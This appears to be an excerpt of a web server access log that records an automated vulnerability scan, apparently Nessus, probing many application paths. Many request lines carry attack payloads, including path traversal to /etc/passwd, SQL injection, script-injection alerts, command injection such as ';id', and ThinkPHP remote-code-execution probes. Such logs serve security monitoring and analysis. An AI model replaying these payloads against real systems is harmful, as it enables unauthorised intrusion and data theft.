1 GET /statistics/ HTTP/1.1
1 GET /statistics/awstats.cgi HTTP/1.1
1 GET /statistics/awstats.pl HTTP/1.1
1 GET /stats-bin-p/ HTTP/1.1
1 GET /stats/ HTTP/1.1
1 GET /stats/awstats.cgi HTTP/1.1
1 GET /stats/awstats.pl HTTP/1.1
1 GET /stats_old/ HTTP/1.1
2 GET /status.php3 HTTP/1.1
1 GET /status.xsl. HTTP/1.1
1 GET /status/ HTTP/1.1
1 GET /stcenter.nsf HTTP/1.1
1 GET /storage/ HTTP/1.1
1 GET /store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
2 GET /store/ HTTP/1.1
1 GET /store/admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /store/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
1 GET /store/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
1 GET /store/index.php HTTP/1.1
1 GET /store/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
1 GET /store/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /storemgr/ HTTP/1.1
1 GET /story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
1 GET /stream/0 HTTP/1.1
1 GET /stronghold-info/ HTTP/1.1
1 GET /stronghold-info HTTP/1.1
1 GET /stronghold-status/ HTTP/1.1
1 GET /stronghold-status HTTP/1.1
1 GET /struts-cookbook-1.0.2/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.1/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.2.4/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.2.7/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.2.8/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.2.9/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.3.10/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.3.5/processSimple.do HTTP/1.1
1 GET /struts-cookbook-1.3.8/processSimple.do HTTP/1.1
1 GET /struts-cookbook/processSimple.do HTTP/1.1
1 GET /struts-examples-1.0.2/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.1/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.2.4/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.2.7/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.2.8/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.2.9/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.3.10/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.3.5/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples-1.3.8/upload/upload-submit.do HTTP/1.1
1 GET /struts-examples/upload/upload-submit.do HTTP/1.1
1 GET /stuff/ HTTP/1.1
1 GET /style/ HTTP/1.1
1 GET /styles.php?toroot=/etc/passwd%00 HTTP/1.1
1 GET /styles/ HTTP/1.1
1 GET /stylesheet/ HTTP/1.1
1 GET /stylesheets/ HTTP/1.1
1 GET /subir/ HTTP/1.1
1 GET /subsystems/permissions.info.php HTTP/1.1
1 GET /sugar/ HTTP/1.1
1 GET /sugar/index.php?action=Login&module=Users HTTP/1.1
1 GET /sugarcrm/ HTTP/1.1
1 GET /sugarcrm/index.php?action=Login&module=Users HTTP/1.1
1 GET /sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /sugarsuite/ HTTP/1.1
1 GET /sugarsuite/index.php?action=Login&module=Users HTTP/1.1
1 GET /sun/ HTTP/1.1
1 GET /super_stats/ HTTP/1.1
1 GET /superguestconfig HTTP/1.1
1 GET /supersimpleblog/index.php HTTP/1.1
1 GET /support-center/ HTTP/1.1
1 GET /support-center/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /support-center/support.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /support.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /support/ HTTP/1.1
1 GET /support/customer.pl HTTP/1.1
1 GET /support/faq.php?action=&type=view&s=&id=-1%27%20UNION%20SELECT%200%2c1747889440%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
1 GET /support/form.php HTTP/1.1
1 GET /support/helpdesk/ HTTP/1.1
1 GET /support/helpdesk/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /support/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
2 GET /support/index.php HTTP/1.1
1 GET /support/support.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /support/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /support/ttx.cgi HTTP/1.1
1 GET /supporter/ HTTP/1.1
1 GET /supporter/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /supportsuite/ HTTP/1.1
1 GET /supportsuite/index.php HTTP/1.1
1 GET /surgeweb?username_ex=\"><scri<script>alert(42);</script><input type=\"hidden
1 GET /survey.inc.php?path=/etc/passwd%00 HTTP/1.1
1 GET /survey/ HTTP/1.1
1 GET /survey/admin/admin.php?sid=0' HTTP/1.1
1 GET /survey/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
1 GET /surveys/ HTTP/1.1
1 GET /surveys/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
1 GET /swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
1 GET /swr.jsp?q=%25\"<script>alert(1717627921)</script>&swrnum=1 HTTP/1.1
1 GET /sws/data/sws_data.js HTTP/1.1
1 GET /swsbobje/ HTTP/1.1
1 GET /swvm/ConsoleContainer.jsp HTTP/1.1
1 GET /symantec.jsp HTTP/1.1
1 GET /sympa/ HTTP/1.1
1 GET /sympa/remindpasswd HTTP/1.1
1 GET /symphony/ HTTP/1.1
1 GET /symphony/index.php?mode=administration HTTP/1.1
1 GET /sys/ HTTP/1.1
1 GET /sysadmin/ HTTP/1.1
1 GET /sysbackup/ HTTP/1.1
1 GET /sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
1 GET /sysinfo/ HTTP/1.1
1 GET /sysinfo/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
1 GET /syslog.htm HTTP/1.1
1 GET /sysmgr/SysMgr.html HTTP/1.1
1 GET /sysmgr/legacy/SysMgr.html HTTP/1.1
1 GET /system.xml HTTP/1.1
1 GET /system/ HTTP/1.1
1 GET /system/console?version=1.5 HTTP/1.1
2 GET /system/login HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /tar/ HTTP/1.1
1 GET /tarantella/ HTTP/1.1
1 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap HTTP/1.1
1 GET /tarjetas/ HTTP/1.1
1 GET /taskfreak/login.php HTTP/1.1
1 GET /tasktracker.jsp HTTP/1.1
1 GET /tdbin/ HTTP/1.1
1 GET /te_html/ HTTP/1.1
1 GET /teaming/ HTTP/1.1
1 GET /teaming/c/portal/login HTTP/1.1
1 GET /tech/ HTTP/1.1
1 GET /technote/ HTTP/1.1
1 GET /technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1
1 GET /temenos/BrowserWeb/portal/portalbanner.htm HTTP/1.1
1 GET /temp/ HTTP/1.1
1 GET /template/ HTTP/1.1
1 GET /templates/ HTTP/1.1
1 GET /temporal/ HTTP/1.1
1 GET /test-cgi/ HTTP/1.1
1 GET /test-cgi?* HTTP/1.0
1 GET /test.bat?|type%20c:\\windows\\win.ini HTTP/1.1
1 GET /test.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
7 GET /test.cgi HTTP/1.1
1 GET /test.js HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /test/ HTTP/1.1
7 GET /test HTTP/1.1
1 GET /testing/ HTTP/1.1
1 GET /testlink/ HTTP/1.1
1 GET /testlink/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1717627927')</script> HTTP/1.1
1 GET /testrail/index.php?/auth/login/ HTTP/1.1
1 GET /tests/ HTTP/1.1
1 GET /tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
1 GET /testsite/typo3/ HTTP/1.1
1 GET /testweb/ HTTP/1.1
1 GET /texis.cgi/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /texis.exe/?-dump HTTP/1.1
1 GET /texis.exe/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /texis/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /themes/ HTTP/1.1
1 GET /themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
1 GET /things/ HTTP/1.1
1 GET /things/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
1 GET /thinkphp/?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp/public/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp/public/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5020/?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5020/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5020/public/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5020/public/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5023/?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5023/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /thinkphp5023/public/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /thinkphp5023/public/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /this_page_should_not_exist.htm HTTP/1.1
1 GET /this_server/all_settings.shtml HTTP/1.1
1 GET /thyme/ HTTP/1.1
1 GET /thyme/event_view.php?eid=34%20UNION%20SELECT%202128575866 HTTP/1.1
1 GET /ticket/ HTTP/1.1
1 GET /ticket/ttx.cgi HTTP/1.1
1 GET /tickets/ HTTP/1.1
1 GET /tickets/index.php HTTP/1.1
1 GET /tickets/login.php HTTP/1.1
1 GET /tickets/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
1 GET /tickets/ttx.cgi HTTP/1.1
1 GET /tigercrm/ HTTP/1.1
1 GET /tigercrm/index.php HTTP/1.1
1 GET /tigercrm/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
1 GET /tigercrm/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../vtigerservice.php%00 HTTP/1.1
1 GET /tightvnc-jviewer.jar HTTP/1.1
4 GET /tiki-index.php HTTP/1.1
1 GET /tiki/ HTTP/1.1
1 GET /tiki/tiki-index.php HTTP/1.1
1 GET /tikiwiki/tiki-index.php HTTP/1.1
1 GET /tinfo.php?id=1717627945 HTTP/1.1
1 GET /tiny_mce/plugins/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tiny_mce/plugins/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tiny_mce/plugins/tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce3/jscripts/tiny_mce/plugins/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce3/jscripts/tiny_mce/plugins/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinymce3/jscripts/tiny_mce/plugins/tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /tinywebgallery/ HTTP/1.1
1 GET /tinywebgallery/index.php HTTP/1.1
1 GET /tmp/ HTTP/1.1
1 GET /tmui/ HTTP/1.1
1 GET /tomcat_proxy_directory_traversal.nasl1717627927 HTTP/1.1
1 GET /tools/ HTTP/1.1
1 GET /tools/awstats.cgi HTTP/1.1
1 GET /tools/awstats.pl HTTP/1.1
1 GET /top.php?header=../../../../../../../../etc/passwd HTTP/1.1
1 GET /topic.php?tid='select HTTP/1.1
1 GET /toplist/ HTTP/1.1
1 GET /toplist/config.php?returnpath=/etc/passwd%00 HTTP/1.1
1 GET /toplist/sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
1 GET /topology/dynamicViews.jar HTTP/1.1
1 GET /topsite/ HTTP/1.1
1 GET /topsite/config.php?returnpath=/etc/passwd%00 HTTP/1.1
1 GET /topsites/ HTTP/1.1
1 GET /topsites/index.php HTTP/1.1
1 GET /tor/ HTTP/1.1
1 GET /tos/ HTTP/1.1
1 GET /tos/index.php?user/login HTTP/1.1
1 GET /tpv/ HTTP/1.1
1 GET /trabajo/ HTTP/1.1
1 GET /trac/ HTTP/1.1
1 GET /trac/query?group=-- HTTP/1.1
1 GET /trac/search?q=http[:]//www[.]example[.]com/ HTTP/1.1
1 GET /trace.axd HTTP/1.1
1 GET /track/ HTTP/1.1
1 GET /tracker/ HTTP/1.1
1 GET /tracker/htdocs/ HTTP/1.1
1 GET /tracking/ HTTP/1.1
1 GET /trade.php HTTP/1.1
1 GET /transito/ HTTP/1.1
1 GET /transpolar/ HTTP/1.1
1 GET /traq/admincp/login.php HTTP/1.1
1 GET /traq/index.php HTTP/1.1
1 GET /trc HTTP/1.1
1 GET /tree.php HTTP/1.1
1 GET /tree/ HTTP/1.1
1 GET /trees/ HTTP/1.1
1 GET /triton-help/en/first.htm HTTP/1.1
1 GET /trouble_ticket_express/ttx.cgi HTTP/1.1
1 GET /tsp// HTTP/1.1
1 GET /tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
1 GET /tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
1 GET /tsweb.asp HTTP/1.1
3 GET /tsweb/ HTTP/1.1
1 GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /ttforum/ HTTP/1.1
1 GET /ttx.cgi HTTP/1.1
1 GET /ttx/ttx.cgi HTTP/1.1
1 GET /turba/ HTTP/1.1
1 GET /twg/ HTTP/1.1
1 GET /twg/index.php HTTP/1.1
2 GET /twiki/bin/ HTTP/1.1
1 GET /twiki/bin/view/TWiki/WebHome HTTP/1.1
1 GET /typo3/ HTTP/1.1
1 GET /typo3/index.php HTTP/1.1
1 GET /typo3/typo3/index.php HTTP/1.1
1 GET /typolight/ HTTP/1.1
1 GET /typolight/image.php?src=system/config/localconfig.php HTTP/1.1
1 GET /ubbthreads.php HTTP/1.1
1 GET /ubbthreads/ HTTP/1.1
1 GET /ubbthreads/ubbthreads.php HTTP/1.1
7 GET /ucsm/isSamInstalled.cgi HTTP/1.1
1 GET /uddi/default.aspx HTTP/1.1
1 GET /uddipublic/default.aspx HTTP/1.1
1 GET /uebimiau/ HTTP/1.1
1 GET /uebimiau/error.php?selected_theme=%3cscript%3ealert%28uebimiau_selected_theme_xss.nasl%29%3c%2fscript%3e HTTP/1.1
2 GET /ui/ HTTP/1.1
1 GET /ui/faces/Login.xhtml HTTP/1.1
1 GET /ui/login.action HTTP/1.1
1 GET /ui/login/ HTTP/1.1
1 GET /unauthenticated/..%01/..%01/..%01/..%01/var/user_def/ad.conf HTTP/1.1
1 GET /unified-console.html HTTP/1.1
1 GET /upb/ HTTP/1.1
1 GET /upb/chat/login.php?option=chat HTTP/1.1
1 GET /upb/db/users.dat HTTP/1.1
1 GET /upb/index.php HTTP/1.1
1 GET /update.php?op=info HTTP/1.1
1 GET /update.php HTTP/1.1
1 GET /updates/ HTTP/1.1
1 GET /upgrade/index.php HTTP/1.1
1 GET /upgradev1.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /upload.cgi HTTP/1.1
1 GET /upload/ HTTP/1.1
1 GET /upload/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
2 GET /upload/index.php HTTP/1.1
1 GET /upload/upload-submit.do HTTP/1.1
1 GET /uploader/admin/index.php?cmd=login HTTP/1.1
1 GET /uploads/ HTTP/1.1
2 GET /upnp/BasicDevice.xml HTTP/1.1
1 GET /urchin/ HTTP/1.1
1 GET /urchin3/ HTTP/1.1
1 GET /urchin5/ HTTP/1.1
1 GET /us/ HTTP/1.1
2 GET /usage/ HTTP/1.1
1 GET /user.cgi?url=\">%3Cscript%3Ealert(\"gossamer_links_url_xss.nasl\")%3B%3C%2Fscript%3E&from=add HTTP/1.1
2 GET /user.php HTTP/1.1
1 GET /user/ HTTP/1.1
1 GET /user/login HTTP/1.1
1 GET /userSession.do?method=getLanguage HTTP/1.1
1 GET /user_settings.cfg HTTP/1.1
1 GET /userdb/ HTTP/1.1
1 GET /userportal/webpages/myaccount/login.jsp HTTP/1.1
1 GET /users/ HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /users/users.php HTTP/1.1
1 GET /usr/ HTTP/1.1
1 GET /usrdetails.php?sgnuptype=csaleID<script>nessus</script> HTTP/1.1
1 GET /ustats/ HTTP/1.1
1 GET /ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /usuario/ HTTP/1.1
1 GET /usuarios/ HTTP/1.1
1 GET /util/ HTTP/1.1
1 GET /utils/ HTTP/1.1
1 GET /v2.0/environments/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /v4/ HTTP/1.1
1 GET /vanilla/ HTTP/1.1
1 GET /vanilla2/ HTTP/1.1
1 GET /vbulletin/index.php HTTP/1.1
1 GET /vcard/ HTTP/1.1
1 GET /vcard/admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
1 GET /vcards/ HTTP/1.1
1 GET /vcards/admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
3 GET /version HTTP/1.1
1 GET /vfs/ HTTP/1.1
1 GET /vhcs2/ HTTP/1.1
1 GET /vhcs2/admin/ip_manage.php HTTP/1.1
1 GET /vhcs2/include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /vhcs2/index.php HTTP/1.1
1 GET /vhost.php?action=logout&time=1717627691 HTTP/1.1
1 GET /viart/viart_shop.xml HTTP/1.1
1 GET /viart_shop.xml HTTP/1.1
1 GET /vicidial/ HTTP/1.1
1 GET /vicidial/admin.php HTTP/1.1
1 GET /view.html HTTP/1.1
2 GET /view.php?PG=foobar HTTP/1.1
1 GET /view/System/WebHome?rev=1 HTTP/1.1
1 GET /view/TWiki/WebHome HTTP/1.1
1 GET /view/hsrindex.shtml HTTP/1.1
1 GET /view/view.shtml HTTP/1.1
1 GET /view_user.php?list=1&letter=&sort_by='select HTTP/1.1
1 GET /viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1
1 GET /viewcvs.cgi/ HTTP/1.1
1 GET /viewpage.php?file=/etc/passwd HTTP/1.1
2 GET /viewvc.cgi/ HTTP/1.1
2 GET /viewvc/ HTTP/1.1
1 GET /virtualizor/index.php HTTP/1.1
1 GET /vncviewer.jar HTTP/1.1
1 GET /vpn/ HTTP/1.1
4 GET /vpopmail/README HTTP/1.1
1 GET /vsapres/web20/core/login.aspx HTTP/1.1
1 GET /vsmc.html HTTP/1.1
2 GET /vtiger/ HTTP/1.1
1 GET /vtiger/index.php HTTP/1.1
1 GET /vtiger/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
1 GET /vtiger/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../vtigerservice.php%00 HTTP/1.1
1 GET /vtigercrm/ HTTP/1.1
1 GET /w-agora/ HTTP/1.1
1 GET /w-agora/index.php HTTP/1.1
1 GET /w3perl/ HTTP/1.1
2 GET /wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
2 GET /wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
2 GET /wa?DEBUG-SHOW-VERSION HTTP/1.1
1 GET /wavemaker/ HTTP/1.1
1 GET /wavemaster.internal/ HTTP/1.1
2 GET /wavemaster.internal HTTP/1.1
1 GET /way-board/ HTTP/1.1
2 GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
1 GET /wb/ HTTP/1.1
1 GET /wb/admin/login/index.php HTTP/1.1
1 GET /wbboard/ HTTP/1.1
1 GET /wbboard/acp/index.php HTTP/1.1
1 GET /wbboard/acp/lib/inserts.sql HTTP/1.1
1 GET /wbboard/index.php HTTP/1.1
1 GET /wc.dll?wwMaint~EditConfig HTTP/1.1
1 GET /wcd/system.xml HTTP/1.1
1 GET /wconnect/wc.dll?wwMaint~EditConfig HTTP/1.1
1 GET /weather/hw3.cgi?daysonly=0).system('id').( HTTP/1.1
1 GET /weather/hw3.php?daysonly=0).system(id).( HTTP/1.1
1 GET /web-console/ServerInfo.jsp%00 HTTP/1.1
1 GET /web-console/ServerInfo.jsp HTTP/1.1
1 GET /web-determinations/?CookieSet=true HTTP/1.1
1 GET /web.config HTTP/1.1
1 GET /web/#/login HTTP/1.1
2 GET /web/ HTTP/1.1
1 GET /web/signin HTTP/1.1
1 GET /web/status/sys.overview HTTP/1.1
1 GET /web800fo/ HTTP/1.1
1 GET /webMathematica/ HTTP/1.1
1 GET /web_usage/ HTTP/1.1
1 GET /webaccess/ HTTP/1.1
1 GET /webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
1 GET /webadmin/ HTTP/1.1
2 GET /webalizer/ HTTP/1.1
1 GET /webapp/home.html?0 HTTP/1.1
1 GET /webapp/js/UI_String.en-US.js HTTP/1.1
1 GET /webapp HTTP/1.1
1 GET /webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
1 GET /webapps/ HTTP/1.1
1 GET /webapps/login/index.html HTTP/1.1
1 GET /webboard/ HTTP/1.1
1 GET /webboard/generate.cgi HTTP/1.1
1 GET /webc.cgi/ HTTP/1.1
1 GET /webcart-lite/ HTTP/1.1
1 GET /webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
1 GET /webcart/ HTTP/1.1
1 GET /webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
1 GET /webconsole/webpages/login.jsp HTTP/1.1
1 GET /webct/about.jsp HTTP/1.1
1 GET /webdata/ HTTP/1.1
1 GET /webdb/ HTTP/1.1
2 GET /webdist.cgi?distloc=;id HTTP/1.1
1 GET /webftp/ HTTP/1.1
1 GET /webftp/index.php HTTP/1.1
1 GET /webgallery/ HTTP/1.1
1 GET /webgallery/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
1 GET /webglimpse.cgi HTTP/1.1
1 GET /webglimpse/webglimpse.cgi HTTP/1.1
1 GET /webhost HTTP/1.1
1 GET /webimages/ HTTP/1.1
1 GET /webimages2/ HTTP/1.1
1 GET /webinsta/ HTTP/1.1
1 GET /webinsta/index.php?templates_dir=/etc/passwd%00 HTTP/1.1
1 GET /webl/index.html HTTP/1.1
1 GET /weblog/ HTTP/1.1
